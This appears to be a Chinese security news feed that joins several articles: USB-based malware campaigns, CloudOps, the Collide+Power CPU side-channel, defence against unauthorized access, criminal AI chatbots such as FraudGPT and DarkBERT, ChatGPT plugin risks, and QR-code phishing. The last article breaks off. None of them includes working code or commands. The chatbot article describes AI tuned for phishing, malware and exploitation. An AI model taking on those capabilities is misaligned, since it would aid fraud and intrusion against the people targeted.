ISHACK AI BOT

近期，网络犯罪分子利用U盘进行恶意软件攻击的事件大幅增加。据Mandiant的安全研究人员称，在2023年上半年，通过U盘窃取敏感信息的恶意软件攻击增加了三倍之多。这些研究人员还披露了两个具体的攻击活动的细节。 其中一个攻击活动是由网络间谍组织TEMP.Hex发起的，目标是针对欧洲、亚洲和美国的公共和私营机构进行攻击。 这些U盘中包含了多种恶意软件，并采用DLL劫持技术将最终有效载荷下载到被入侵系统的内存中。一旦这些恶意代码被执行，SOGU恶意软件就会执行各种操作，如捕获屏幕截图、记录键盘输入、建立反向shell连接以及启用远程桌面连接执行其他文件。 这些被窃取的数据可以通过TCP、UDP或ICMP使用自定义二进制协议发送到攻击者的命令和控制（C2）服务器内。此次攻击活动的目标行业包括建筑、工程、政府、制造、零售、媒体和制药行业。 在一次攻击活动中，受害者被诱使点击一个文件，该文件看似是一个在U盘根目录下发现的合法的可执行文件。在执行该文件后，就会使得感染链触发，然后下载一个名为SNOWYDRIVE的基于shellcode的后门程序。 该恶意软件不仅会将自身复制到与受感染系统相连的可移动驱动器上，而且还会执行各种其他的恶意操作，如写入或删除文件、进行文件上传以及执行反向的shell命令。 最近，Check Point研究小组发现了一个新的基于USB的攻击活动，该活动是由一个名为 "Camaro"的组织发起的。 该攻击活动专门针对欧洲的一家医疗机构进行攻击，这其中涉及部署多个新版本的恶意软件工具集，包括WispRider和HopperTick。据报道，Camaro 利用有效的U盘在缅甸、韩国、英国、印度和俄罗斯发起攻击。 目前专家强烈建议企业优先考虑针对USB设备的访问做限制，并在将USB设备连接到网络之前对恶意文件进行全面的扫描。

随着越来越多的企业依赖云计算来简化运营并提高可扩展性，企业正在采用云优先的方法，将网络、性能、安全、终端管理和支持全部通过CloudOps结合起来。CloudOps结合了IT流程和DevOps原理，确保云基础设施及其应用的平稳运行、维护和优化。 随着数据泄露和安全漏洞给企业带来了重大风险，CloudOps已经成为确保基于云的系统安全性和完整性的关键组成部分。通过这篇文章，我们可以学习构建和自动化一个强大的云优先策略，帮助各种规模的组织免受潜在的云安全风险。 CloudOps CloudOps不仅是Cloud+DevOps的深度结合，而是从CARES (Cost, Automation, Resilience, Elasticity, Security)五大维度进一步升级了DevOps实践的关注面，让业务代码的构建效率、发布效率、高可用能力、成本控制等的多个维度可感知、可衡量、可控制。 根据Gartner的数据，预计今年全球最终用户在公共云服务上的支出将增长近22%，总计5973亿美元。鉴于其普及程度，安全专家将云视为数字业务下一阶段的推动力，因为它是数字化转型和服务的高度战略平台。 虽然云的使用在现代商业环境中几乎是普遍的，但许多部署的架构仍然很差，或者是临时组装的。2023年的数字化趋势表明，云基础设施优化是需要关注的首要事项之一。云的兴起是显而易见的，企业领导者正在努力发展他们的IT、工程和开发团队，为他们的业务构建正确的云安全管理和运营策略。这就是CloudOps发挥作用的地方。 CloudOps专注于管理和优化基于云的基础设施、应用程序和服务。它考虑了云计算的独特特征和功能，例如弹性、可扩展性和资源虚拟化。 许多企业依靠传统的IT运营(ITOps)实践来管理他们的云部署。然而，随着云基础设施复杂性的增长，有远见的企业已经转向专业知识和专用流程，以更好地处理他们的云优先系统。 CloudOps结合了ITOps和DevOps等其他操作模型的原则，使它们适用于基于云的架构。这些原则、流程和最佳实践可帮助跨云架构、安全性、遵从性和IT操作的安全团队管理基础设施。以下是使CloudOps与众不同的一些特性： 管理和优化云——CloudOps专注于管理和优化基于云的基础设施、应用程序和服务。它考虑了云计算的独特特征和功能，例如弹性、可扩展性和资源虚拟化。 底层基础设施——IT运营主要处理物理硬件和数据中心，而CloudOps则以虚拟化资源和云服务提供商为中心。 安全性——由于云环境具有独特的安全考虑，CloudOps专注于实现强大的安全措施，例如身份和访问管理、数据加密和主动威胁监控，所有这些都是基于云的系统所特有的。 可扩展性——与传统IT操作相比，CloudOps提供了更大的灵活性。云环境允许企业根据需求增加或减少资源，而传统IT操作中的扩展通常需要额外的硬件采购和部署。 自动化——CloudOps利用自动化工具和框架来简化云中的资源供应、配置管理和应用程序部署。与传统的IT操作相比，这种级别的自动化通常更先进、更高效。 通过CloudOps服务获取价值 随着云技术不断满足不断变化的业务需求，从本地迁移到云已经不足以彻底改变业务基础设施。混合云和多云结构的兴起也增加了与云相关的复杂性和关键性。 为了从云计算中获得更多价值，企业一直致力于通过共享服务和灵活的商业模式来提高成本效率。例如，基于云的基础设施即服务(IaaS)通过自动化在维护卓越的功能和操作敏捷性方面发挥着关键作用，使企业能够优化其操作。 在这种情况下，CloudOps服务获得了显著的发展势头。通过在云计算环境中管理软件，CloudOps确保企业有效地利用基于云的系统的好处。由于云操作服务侧重于优化性能和容量，因此它验证了使云平台、应用程序和内部数据能够以最佳方式执行的最佳实践和流程。 提高效率和可扩展性 CloudOps优化了资源利用率，减少了人工干预，提高了运营效率。通过主动监控和性能优化，CloudOps团队可以及时识别和解决问题，最大限度地减少停机时间，最大限度地提高运行效率。 CloudOps还支持可扩展性。当企业根据需求增加或减少资源时，确保最佳性能而不进行不必要的资源分配是关键。通过集中管理和利用标准化实践，CloudOps简化了运营，降低了复杂性，并使组织能够专注于核心业务活动。 成本优化 成本优化是在组织内实施CloudOps的一个重要优势。CloudOps团队利用自动化、监控工具和高级分析来优化资源分配和使用。随着时间的推移，安全团队在继续监控资源消耗并根据需求应用扩展策略时看到了成本节约。CloudOps还确保资源的有效供应，避免不必要的费用。 改进的安全性 CloudOps在企业的网络安全战略中发挥着关键作用，保护关键业务数据免受基于云的安全威胁。CloudOps专注于实施稳健的安全措施来保护敏感数据，并确保基于云的系统的完整性。为此，安全团队持续监控云环境中的漏洞，主动检测和缓解安全风险，并确保遵守行业法规。 CloudOps采用各种策略和实践来有效地保护云环境，包括： IAM (Identity and Access Management)——CloudOps实施稳健的IAM策略来管理用户的身份、角色和访问权限。这确保了只有经过授权的个人才能访问和修改云环境中的资源。 加密——CloudOps利用加密技术来保护静态和传输中的数据。加密保护敏感信息免受未经授权的访问，即使发生违规行为。 定期安全审计——CloudOps团队进行定期安全审计，以识别云基础设施中的漏洞和弱点。这使他们能够主动解决潜在的安全漏洞并实现必要的补丁或更新。 网络安全——CloudOps通过防火墙、入侵检测系统和vpn (virtual private Network)等网络安全措施来监控和保护云环境，防止未经授权的访问和恶意活动。 事件响应计划——CloudOps开发并维护稳定的事件响应计划，以有效地处理安全事件。这包括定义升级程序、进行演练和实施措施，以尽量减少潜在安全漏洞的影响。 合规管理—CloudOps确保遵守特定行业的法规和标准。这包括实施控制和流程，以满足数据隐私要求并保持合规性。 持续监控和威胁检测——CloudOps团队持续监控云环境，采用先进的监控工具和技术，及时检测和响应潜在的安全威胁，其中包括对日志、网络流量和系统活动的实时监控。 如何有效实施CloudOps CloudOps通过简化云环境的管理，使组织能够专注于其核心竞争力。在实施CloudOps最佳实践时，安全团队可以遵循以下关键步骤。 定义你的云战略和目标 首先评估现有的IT基础架构、应用程序和业务流程。了解当前环境的优势、劣势和局限性，以及采用云技术的所有业务驱动因素。 然后，明确定义在组织内实施CloudOps的目标和预期结果。确定关注的特定领域，如效率、可扩展性、安全性或成本优化。这些定义允许高级领导层将云战略与业务目标联系起来，并在选择合适的云服务提供商时缩小特定需求。 设计CloudOps流程 为CloudOps开发与组织目标一致的清晰流程也很重要。这可能包括定义资源供应和配置管理过程、性能监控、事件响应协议和安全实践。 实现自动化和编排 自动化帮助组织扩展和成长，提供CloudOps服务的团队可以有效地利用自动化和编排工具来简化资源供应、配置和部署过程。 自动化提高了效率，并将人为错误的风险降至最低。此外，自动化云资源的供应和取消供应使组织在面对不断变化的业务需求时更加灵活。 利用基础设施作为代码（IaC） 在CloudOps中，基础设施即代码(IaC)支持使用基于代码的配置管理和提供云基础设施。借助IaC, CloudOps团队可以使用代码或配置文件定义云基础设施的所需状态，包括虚拟机、网络、存储、安全设置和其他资源。此代码作为底层逻辑，指导如何提供和配置基础设施。 通过将基础设施视为代码，CloudOps从业者可以利用版本控制系统来跟踪更改、执行代码审查和有效协作。这确保了跨部署的一致性和可重复性，并简化了管理复杂云环境的过程。IaC允许快速部署和扩展基础设施，因为基于代码的配置可以轻松地在多个环境中复制和应用。 建立持续集成与部署（CI/CD） 持续集成和部署（CI/CD）侧重于自动化和精简云环境中的软件开发和部署过程。在CloudOps框架中，CI/CD管道可以配置为在代码更改提交到存储库时自动触发。这些管道执行一系列预定义的操作，例如代码编译、测试、漏洞扫描和打包。一旦代码通过了所有必要的测试和检查，它就被部署到云环境中，使其可供最终用户使用。 这使安全团队能够加速软件更新时的传播，同时保持高质量并降低部署失败的风险。CI/CD还促进了开发、运营和测试团队之间的协作，促进了快速的反馈周期，并使团队能够快速响应不断变化的业务需求和客户需求。 通过监控以获得最佳性能 CloudOps中的性能监控包括对云环境的持续监控和分析，以评估各种资源和应用程序的性能。它有助于确保最佳性能，识别潜在的问题，并采取主动措施保持高水平的效率。CloudOps团队通常监控以下关键领域： 资源：监控云资源，如虚拟机、数据库、存储和网络组件。监控CPU使用率、内存使用率、网络流量和磁盘I/O等指标有助于识别资源密集型进程或潜在的性能下降。 应用程序性能：监控在云环境中运行的应用程序的性能。这包括跟踪响应时间、延迟、吞吐量和错误率，以识别任何性能问题或异常。 可扩展性：评估云环境处理增加的工作负载的能力。确定资源是否可以动态扩展以满足需求，并确定在高峰期可能影响性能的潜在限制或约束。 警报、通知和历史数据：性能监控工具根据预定义的阈值或异常生成警报和通知。这使得CloudOps团队能够收到有关性能问题的实时警报，并立即采取行动来缓解潜在问题。这些工具还可以收集随时间变化的数据，允许进行历史分析和报告。该团队可以使用这些数据来确定趋势、模式和性能模式，从而使那些负责提供CloudOps服务的人员能够做出有关资源优化、容量规划和性能改进的明智决策。 SentinelOne的云安全策略 SentinelOne使组织能够通过Singularity™cloud在所有云环境(公共、私有和混合)中保护其终端。由于数千个帐户分布在多个云上，组织需要为其云基础设施提供适当的安全性。Singularity Cloud的工作原理是将分布式、自主的终端保护、检测和响应扩展到运行在公共和私有云中以及本地数据中心的计算工作负载。 企业级EPP和EDR——在一个SentinelOne代理中获得完整的终端检测和响应以及容器覆盖。Singularity™Cloud允许在每个节点有一个代理的情况下实现完整的容器可见性，而无需pod插装。 企业管理和部署——选择自动部署Kubernetes Sentinel Agent (Singularity™Cloud的一个组件)到EKS、AKS和GKE集群，或将Linux和Windows Server Sentinel Agents部署到AWS EC2、Azure VM和Google Compute Engine。 人工智能驱动的云工作负载保护——检测未知威胁，如零日漏洞和与新型勒索软件一致的攻击指标，然后隔离它们。对于Linux、Windows服务器和虚拟机，Singularity Cloud保护容器运行时不受干扰。 总结 云提供的可扩展性和灵活性伴随着固有的复杂性。CloudOps通过为组织提供必要的工具和流程来监控、管理和优化其云基础设施，从而解决了这些挑战。它使企业能够在确保高可用性和高性能的同时简化运营、降低成本并提高资源利用率。 随着企业采用云技术来推动创新和可扩展性，企业正在优先考虑实施CloudOps，以有效管理云环境。CloudOps为云管理带来了一种全面的方法，将技术专长、自动化和最佳实践相结合，以优化性能并构建长期安全态势。 随着云技术的不断发展，CloudOps采用无服务器计算、容器化和人工智能等新兴技术来推动创新并释放新的可能性。CloudOps还使组织能够快速适应不断变化的业务需求，并充分利用云服务的全部潜力。

一种可以导致数据泄漏的新侧信道攻击方法几乎可以攻陷任何现代CPU，但我们不太可能在短期内看到它被广泛实际利用。 这项研究是由来自奥地利格拉茨科技大学和德国CISPA亥姆霍兹信息安全中心的八名研究人员共同进行的。参与这项研究的一些专家发现了臭名昭著的Spectre和Meltdown漏洞，以及另外几种侧信道攻击方法。 这种新的攻击名为Collide+Power，其破坏力与Meltdown和一类名为微架构数据采样（MDS）的漏洞相提并论。 Collide+Power是一种基于软件的通用型攻击，针对搭载英特尔、AMD或Arm处理器的设备，它适用于任何应用程序和任何类型的数据。芯片制造商们正在发布各自的安全公告，该漏洞已被命名为CVE-2023-20583。 然而研究人员指出，Collide+Power不是一个真正的处理器漏洞，它利用一些CPU部件旨在共享来自不同安全域的数据这一点大做文章。 攻击者可以利用这些共享的CPU部件将自己的数据与来自用户应用程序的数据结合起来。攻击者在改变他们控制的数据时，可以数千次迭代测量CPU功耗，这使他们能够确定与用户应用程序关联的数据。 没有特权的攻击者（比如通过在目标设备上植入恶意软件）可以利用Collide+Power攻击，获得有价值的数据，比如密码或加密密钥。 研究人员特别指出，Collide+Power攻击增强了其他功率侧信道信号，比如PLATYPUS和Hertzbleed攻击中使用的信号。 研究人员解释道：“PLATYPUS和Hertzbleed等以前基于软件的功率侧信道攻击针对加密算法，需要确切了解目标机器上执行的算法或受害者程序。相比之下，Collide+Power针对的是CPU内存子系统，内存子系统把精确的实现抽取出来，因为所有程序都以某种方式需要内存子系统。此外，任何反映功耗的信号都可以被使用，因为Collide+Power利用了基本的功率泄漏。” 研究人员发表了一篇详细介绍其研究工作的论文，还推出了Collide+Power网站，专门介绍这一研究发现。 他们描述了Collide+Power攻击的两种变体。在要求启用超线程机制的第一种变体中，攻击目标是与不断访问秘密数据（比如加密密钥）的应用程序相关的数据。 “在此过程中，受害者不断将秘密数据重新加载到被攻击的共享CPU部件中。在同一物理核心上运行线程的攻击者现在可以利用Collide+Power，强制秘密数据与攻击者控制的数据之间发生碰撞。” 图1 攻击的第二种变体不需要超线程机制，也不需要目标不断访问秘密数据。 专家们表示：“攻击者在这里利用了操作系统中一个所谓的预读取小装置。这个预读取小装置可以用来将任意数据引入到共享的CPU部件中，再次强行造成数据碰撞，并找回数据。” 虽然从理论上来说这种攻击方法可能会产生重大影响，但在实践中，数据泄漏率比较低，这种方法也不太可能在短期内被用来攻击最终用户。 研究人员已经在这种场景下设法实现了每小时泄漏4.82比特的数据：被攻击的应用程序不断访问秘密信息，攻击者可以通过直接报告CPU功耗情况的运行平均功率限制（RAPL）接口，直接读取CPU功耗数值。按照这个泄漏率，攻击者需要几个小时才能获得密码，需要几天才能获得加密密钥。 研究人员发现，在特殊场景下，攻击者可以大大提高数据泄漏率，最高每小时可泄漏188比特的数据。 格拉茨科技大学参与这个项目的研究人员之一Andreas Kogler告诉安全外媒：“攻击者可以达到每小时188比特的泄漏率，具体取决于被攻击的应用程序和内存中的秘密数据。比如说，密钥或密码是否多次出现在缓存行中。” 另一方面，在实际环境的攻击模拟中，研究人员遇到了实际限制，这大大降低了泄漏率——如果采用遏制手段，泄露每比特就需要一年多。 尽管目前这种攻击带来的风险比较小，但Collide+Power研究强调了潜在的问题，并为未来的研究铺平了道路。 至于缓解措施，在硬件层面防止这类数据碰撞并非易事，需要重新设计通用CPU。另一方面，可以通过确保攻击者无法观察到与功率相关的信号来阻止攻击，这种类型的缓解措施适用于所有的功率侧信道攻击。

未经授权的访问仍然是各种规模的组织面临的最大问题之一。其后果可能很严重，从数据泄露、经济损失到声誉受损和诉讼。因此，对于组织来说，建立一个强大的网络安全策略和实施最佳实践来有效检测和响应未经授权的访问是至关重要的。 在本文中，我们将探讨未经授权访问背后的危险及其主要攻击向量。我们还讨论了如何检测未经授权的访问，并提供了八种最佳实践来帮助组织加强网络安全整体态势。 未经授权访问的风险和后果 根据NIST的说法，未经授权的访问是指“一个人在未经允许的情况下对网络、系统、应用程序、数据或其他资源进行逻辑或物理访问”。未经授权的访问涉及绕过安全措施或利用IT基础设施中的漏洞来访问应该只有授权用户才能访问的系统。 如果您的组织遭受未经授权的数据访问攻击，其后果可能从数据泄露和财务损失到服务不可用甚至丧失对整个网络的控制权。让我们看一些未经授权访问的案例及其后果： 2020年10月，Ticketmaster（一个售卖音乐会、景点和体育等活动的门票的平台）员工被指控多次侵入竞争对手公司的系统以“扼杀”其预售门票业务。2021年，该员工承认罪行，并因此被罚款1000万美元。 美国航空和西南航空是世界上最大的两家航空公司，它们在近日披露了一起数据泄露事件，该事件是由一家第三方供应商Pilot Credentials的黑客攻击造成的。美国航空在一份通知信中表示，Pilot Credentials于2023年6月18日通知了美国航空，称其系统于2023年5月24日遭到了未经授权的访问，导致部分美国航空飞行员的个人信息被泄露。这些信息包括姓名、地址、电话号码、电子邮件地址、出生日期、社会安全号码、驾驶执照号码、护照号码、飞行员证书号码和医疗证书号码等。 不幸的是，这些案例只是冰山一角。网络威胁形势不断发展，网络犯罪分子正在使用新的复杂方法获得非法访问。未经授权的访问不仅连续第四年问鼎“数据泄露的主要原因”，而且其在所有原因中的普遍程度正呈上升趋势，由未经授权的访问造成的数据泄露比例已从2018年的34%增长到2021年的50%。 网络犯罪分子往往会在网络上潜伏很长时间，甚至使用反取证技术来隐藏他们的足迹。IBM发布的《2022年数据泄露成本报告》称，在2022年，发现数据泄露平均需要207天，控制数据泄露平均需要70多天。越早发现数据泄露，组织的损失就越小。 除了经济损失外，未经授权的访问入侵还会以许多其他方式对组织造成损害。未经授权的用户可能会破坏您的财务数据、商业机密、个人信息和其他敏感数据，从而可能导致身份盗用、声誉受损和法律后果。未经授权的访问还可能导致系统停机、生产力损失以及组织的关键服务中断。 直接安全风险： 数据泄露和丢失； 因欺诈造成的经济损失； 身份盗窃； 知识产权失窃； 运营中断； 长期后果： 声誉损失和丧失客户信任； 业务持续性中断； 事件调查成本； 监管处罚； 诉讼和赔偿费用； 基于此，很容易得出结论，组织应该尽快检测和响应未经授权的访问，以便在严重损害发生之前修复威胁。为了检测未经授权的数据访问，您需要了解恶意行为者如何侵入您的系统。下面，让我们来了解一些最常见的攻击媒介。 获取未授权访问的常见攻击向量 获得未经授权的访问有以下几种常见的情况： 密码猜测。网络犯罪分子通常会使用特殊的软件来自动猜测用户名、密码和个人识别码等信息。 利用软件漏洞。网络攻击者可以利用软件缺陷和漏洞获得对应用程序、网络和操作系统的未经授权访问。 社会工程。社会工程策略依靠心理操纵和诱骗用户点击恶意链接、网站弹出窗口或电子邮件附件。其中，网络钓鱼、诈骗、鱼叉式网络钓鱼和冒充是欺骗员工泄露凭证的最常见技术。 利用第三方供应商的漏洞。某些第三方供应商和合作伙伴可能有权访问您的系统。黑客可能会利用供应商IT基础设施中的漏洞，破坏供应商的特权帐户，或者采用其他技术绕过组织的安全控制。 凭据填充。攻击者可以瞄准一个容易被利用的系统，渗透进去，然后使用窃取的凭证访问其他更强大的系统。之所以会出现这种情况，是因为人们倾向于在多个账户上重复使用密码。 那么，如何应对未经授权的访问呢？不幸的是，没有一种“放之四海而皆准”的方法来检测和响应所有这些类型的攻击。响应在很大程度上取决于访问了什么资产、谁访问了它们以及接下来会发生什么。 防止未经授权的访问，响应未经授权的访问检测，并迅速缓解损害的关键是一个强大且全面的网络安全策略。 防止未经授权访问的8个最佳实践 以下是用于预防和检测未授权访问事件的最佳实践和技术列表： 1. 采用最小特权原则 Cybersecurity Insiders发布的《2023年身份和访问管理报告》发现，大约一半的组织拥有超过其职位所需访问权限的员工。 最小权限原则要求定期审查用户访问权限，以确保用户对敏感数据和关键系统的访问权限最小化。考虑到需要给员工足够的访问权限来履行他们的核心职责，在这种情况下，您可以实现一种即时方法，在需要时授予他们临时的额外访问权限。 2. 实施强大的密码管理策略 考虑实现一个强大的密码管理策略，它将帮助您创建、管理和保护用户凭据。正确的策略还可以帮助您养成健康的密码习惯，保持适当的密码复杂性、长度和唯一性，并定期轮换密码。 此外，密码管理策略应该概述组织中负责生成和监督用户密码的个人或角色。通过遵守定义良好的策略，您的组织可以增强其整体密码安全性并降低未经授权访问的风险。 3. 使用多因素身份验证 除了保护密码之外，保护帐户的下一个重要步骤是应用多因素身份验证（MFA）。考虑到很多未经授权的访问都是通过利用单个受损帐户或用户凭据实现的，如果使用多因素身份验证，则可以有效地阻止此类未经授权的访问尝试。 额外的身份验证步骤，例如向用户的移动设备发送一次性密码，将防止未经授权的参与者进行操作。根据微软的说法，采用MFA可以防止大约99.9%的用户帐户被泄露，大大加强了针对未经授权访问的安全措施。 4. 监视用户活动 监视用户活动可以帮助您检测和防止未经授权的访问、内部威胁和潜在的安全漏洞。通过监视谁在组织的IT基础设施中做了什么，您将能够快速检测未授权活动的迹象。这就是为什么建立一个全面的用户活动监控（UAM）解决方案至关重要，该解决方案可以捕获和分析系统中的活动。 UAM解决方案通常提供许多不同的功能。我们建议选择能够监视日志文件、系统事件、网络流量和其他用户活动的软件，以帮助您识别可能表示未经授权访问的任何异常或可疑模式。 5. 维护安全的IT基础设施 为了加强对未经授权访问的保护，将您的监控软件与弹性防火墙相结合。监控软件可以实时检测内部威胁，而防火墙可以作为保护屏障，保护网络、web应用程序、数据库和关键系统免受未经授权的入侵。 对于组织来说，定期对公司IT基础设施进行漏洞评估和渗透测试也是至关重要的。最容易被忽视的安全威胁之一是“未能及时更新保护系统”。2022年1月，红十字会系统遭到攻击，超过51.5万人的数据遭到泄露，这是一个生动的例子，说明未修补的漏洞如何导致可怕的后果。 6. 采用用户行为分析（UEBA） 考虑实现用户实体和行为分析（UEBA）来分析用户活动模式、访问日志和行为配置文件。通过建立正常用户行为的基线，UEBA工具可以自动识别可能表示未授权访问、恶意活动和帐户泄露的异常情况。 例如，如果用户在不寻常的时间或从未知设备突然登录到系统，UEBA工具可能会通知您的安全人员。然后，安全团队可以调查问题并快速响应。 7. 及时应对网络安全事件 您的安全团队需要立即响应安全警报。例如，如果您检测到来自某个帐户的可疑登录尝试，您的安全人员应该能够立即撤销帐户访问权限并阻止会话以防止入侵。 理想情况下，您还应该有一个结构良好的事件响应计划，概述事件响应团队的职责，并提供在发生未经授权的访问尝试或安全事件时可以遵循的明确步骤。 8. 进行安全意识培训 由于攻击者经常以人而不是设备为目标，因此您应该将“以技术为中心”的网络安全方法转变为“以人为中心”的网络安全方法，并使员工成为您的第一道防线。为此，定期开展安全意识培训，让员工了解最新的网络安全威胁，并教育他们安全最佳实践，包括如何识别可疑活动。

继WormGPT（使用面向恶意软件的数据进行训练的ChatGPT克隆版）之后，如今又出现了一种新的生成式人工智能黑客工具：FraudGPT，据称至少另一种基于谷歌的AI聊天机器人Bard的工具正在开发中。 这两个基于AI的机器人程序都出自同一人之手，此人似乎热衷于专门针对众多的恶意用途训练的聊天机器人，包括网络钓鱼、社会工程攻击以及利用漏洞和创建恶意软件。 FraudGPT于7月25日问世，由用户名为CanadianKingpin12的人在各种黑客论坛上四处宣传，他称这款工具是面向骗子、黑客和垃圾邮件发送者的。 图1. FraudGPT在黑客论坛上推广（图片来源：SlashNext） 下一代网络犯罪聊天机器人 网络安全公司SlashNext的研究人员开展的调查显示，CanadianKingpin12正在积极使用从暗网获取的不受限制的数据集训练新的聊天机器人，或基于为打击网络犯罪而开发的复杂的大型语言模型训练聊天机器人。 CanadianKingpin12在私下表示，他们在开发DarkBART——这是谷歌的对话生成式人工智能聊天机器人的“恶意版本”。 研究人员还了解到，广告商还可以访问另一个名为DarkBERT的大型语言模型，该模型由韩国研究人员开发，使用暗网数据进行训练，但目的是为了打击网络犯罪。 DarkBERT可以根据相关的电子邮件地址提供给学术人士，但SlashNext强调，获取邮件地址对黑客或恶意软件开发人员来说远远谈不上是挑战，他们花上大约3美元就能从学术机构获得电子邮件地址。 图2. 待售的.EDU电子邮件账号（图片来源：SlashNext） SlashNext的研究人员透露，CanadianKingpin12表示，DarkBERT机器人程序“胜过使用暗网数据进行训练的同类中所有其他机器人程序”。恶意版本已经过调整，可以执行以下用途： 策划复杂的网络钓鱼活动，以人们的密码和信用卡资料为目标。 执行高级社会工程攻击，以获取敏感信息或获得对系统和网络的未授权访问。 利用计算机系统、软件和网络中的漏洞。 创建和分发恶意软件。 利用零日漏洞以牟取钱财或破坏系统。 正如CanadianKingpin12私下向研究人员透露，DarkBART和DarkBERT都将拥有实时访问互联网的功能，并与谷歌镜头（Google Lens）无缝集成，用于图像处理。 为了演示DarkBERT恶意版本具有的潜力，开发者制作了以下视频： 图3 目前尚不清楚CanadianKingpin12是在DarkBERT的合法版本中修改了代码，还是仅仅获取了模型的访问权，只是将其用于恶意用途。 无论DarkBERT的起源如何、威胁分子的说法到底有多可信，使用生成式AI聊天机器人的趋势总之愈演愈烈，采用率也可能随之增加，因为这种聊天机器人可以为能力较差的威胁分子或那些希望将业务拓展到其他地区但缺乏语言技能的人提供一种简单的解决方案。 SlashNext的研究人员认为，鉴于黑客已经能够使用两个这样的工具，协助执行高级的社会工程攻击，并且在不到一个月的时间内就开始肆虐，这表明了恶意AI对网络安全和网络犯罪领域带来了重大影响。

OpenAI 的 ChatGPT 在人工智能语言模型方面取得了重要的进展，并且为用户提供了一个灵活有效的工具，可以用于模拟人类去生成特定的文字。但最近发生的事件凸显了一个非常关键的问题：网络开始出现了各种第三方的插件。虽然这些插件宣称可以大幅的改进chatgpt的功能，但它们也可能会造成严重的隐私和安全问题。 安全专家在一篇文章指出，在 ChatGPT 中使用插件可能会带来各种各样的危害。如果对此审查和监管不当，第三方插件可能会危及系统的安全，使其容易受到攻击者的攻击。这篇文章的作者强调了 ChatGPT 的灵活性以及可调整性，同时这也为攻击者利用安全漏洞留下了空间。 其他媒体的一篇文章对这一问题进行了深入探讨，强调了安装未经批准的插件可能会泄露使用者的敏感数据。如果不进行充分的检查，那么这些插件可能就无法遵循与主 ChatGPT 系统相同的严格的安全准则。因此，私人信息、知识产权和敏感的个人数据很容易被窃取或非法访问。 创建 ChatGPT 的 OpenAI 公司已经在平台的文档中解决了这些问题。该公司也已经意识到了插件可能会带来的各种安全问题，并敦促用户在选择和部署插件时谨慎行事。为了降低潜在的安全风险，OpenAI 强调只使用经过可靠来源验证和确认的插件这一准则是非常重要的。 随着问题的发展，OpenAI 仍在采取积极措施来保证 ChatGPT 的安全性和可靠性。公司鼓励用户在与系统进行交互时，报告他们遇到的可疑的或恶意的插件。通过进行调查和开展适当的行动，OpenAI 能够保护用户并维护其人工智能平台的完整性。 在这里值得注意的是，并非所有的插件都会带来风险。许多插件，如果是由值得信赖的或者具有安全意识的开发者开发的，都能为 ChatGPT 带来有价值的功能，增强其在各种情况下的实用性和适应性。然而，最大的问题在于如何在开放创新和保护用户免受潜在威胁之间取得适当的平衡。 OpenAI 一直在致力于解决插件的问题，这表明它致力于维护一个安全可靠的平台。作为一个普通用户，在选择和使用与 ChatGPT 相关的插件时，必须要意识到潜在的风险并谨慎行事。

近年来，二维码的使用呈激增之势。事实上，在2012年，97%的消费者还不知道二维码是何物。而到了2022年第一季度，美国以2880960次二维码扫描量领跑全球，这使得这些古怪的代码成为了吸引新型的复杂网络钓鱼活动的一条途径。 INKY最近发现了大量二维码钓鱼活动，不过在开始切入正文之前，先介绍一下二维码基础知识。如果你已经是这方面的专家，请直接跳过这部分。 二维码是怎么来的？ 二维码的演变过程非常有趣。首先问世的是条形码，它是在20世纪60年代日本经济蓬勃发展时开发出来的。在此之前，收银员不得不把每个产品的价格手动录入到收银机中。生意兴隆，腕管综合症随之普遍起来。后来业界找到了一种解决办法。条形码被光学传感器扫描后，可以迅速向电脑发送产品和价格信息。缺点是条形码只能容纳大约20个字母数字字符的信息。最终，市场需要更多的信息，日本公司Denso Wave Incorporated于是在1994年应势发布了首个二维码。 二维码最大的突破出现在2002年，当时发布了一项可以读取二维码的手机功能。如今，二维码被认为是一种必不可少的营销工具。遗憾的是，二维码对钓鱼者来说似乎同样不可或缺。 好吧，现在回到恶意二维码网络钓鱼这个正题。 快速响应还是快速检索？ 从技术上讲，QR代表快速响应，因为二维码能够在弹指之间提供信息。遗憾的是，网络犯罪分子同样可以快速检索员工凭据。 INKY最近截获了数百封二维码网络钓鱼邮件，虽然这些窃取凭据的邮件来自几个不同的黑客，但相似之处很明显，包括如下： 1. 使用基于图像的网络钓鱼策略。 2. 冒充微软。 3. 似乎来自收件人的组织内部。 4. 要求员工解决特定的账户问题，比如2FA设置、账户验证或密码更改。 5. 传达一种紧迫感。 6. 未完成手头任务的后果（确保密码安全、避免账户锁定、承担责任）。 7. 提示员工被告知扫描电子邮件中发现的恶意二维码。 让我们看几个例子。 下面的例子来自一家日本零售商店的被劫持账户。INKY阻止了其中104个威胁到达收件人的收件箱。 图1 下面这封邮件有点不同，它被发送给了174个INKY用户，来自一家美国制造商的被劫持账户和几个专门用来发送网络钓鱼邮件的iCloud账户。 图2 下面所示的第三个例子来自一家在加拿大、法国和美国运营的数字营销服务商的被劫持账户。INKY截获了267封极具破坏性的钓鱼邮件。 图3 值得一提的是，这三封二维码网络钓鱼邮件不是仅仅发给少数INKY客户的。它们是“撒网并祈祷”（spray and pray）手法的一部分。钓鱼者将其电子邮件发送给尽可能多的人（撒网），然后希望（祈祷）绝大多数收件人会落入骗局。在这种情况下，多个行业受到了攻击。在迄今为止发现的545封邮件中，目标受害者都在美国和澳大利亚，他们包括非营利组织、多家财富管理公司、管理咨询公司、土地测量公司和地板公司等。 故事并没有到此结束。在上面的几个例子中似乎是电子邮件文本的东西实际上完全不同。 基于图像的钓鱼邮件轻松绕过安全电子邮件网关（SEG） 恶意二维码只是问题的一方面。如果没有落实合适的电子邮件安全措施，这些危险的邮件就会因另一种已知的网络钓鱼策略（作为附件发送的基于图像的文本消息）而不被发现。 安全电子邮件网关（SEG）和类似的安全系统旨在检测表明网络钓鱼的基本文本线索。规避这种安全机制的一种方法是设计没有文本的电子邮件。在这种情况下，上述例子实际上并不包含文本。没错，没有文本。相反，文本被嵌入到图像中，并附加到网络钓鱼邮件中。 这一招之所以切实可行，是由于大多数电子邮件客户软件自动将图像文件直接显示给收件人，而不是发送附有图像的空白邮件。因此，收件人不知道他们看到的是文本的截图，而不是带有文本的HTML代码。由于没有链接或附件要打开，电子邮件让人觉得很安全。 与SEG不同，INKY使用光学字符识别（OCR）从附加的电子邮件中提取文本，并将其与其他人工智能算法结合使用，以检测电子邮件是否危险。 跟踪恶意二维码 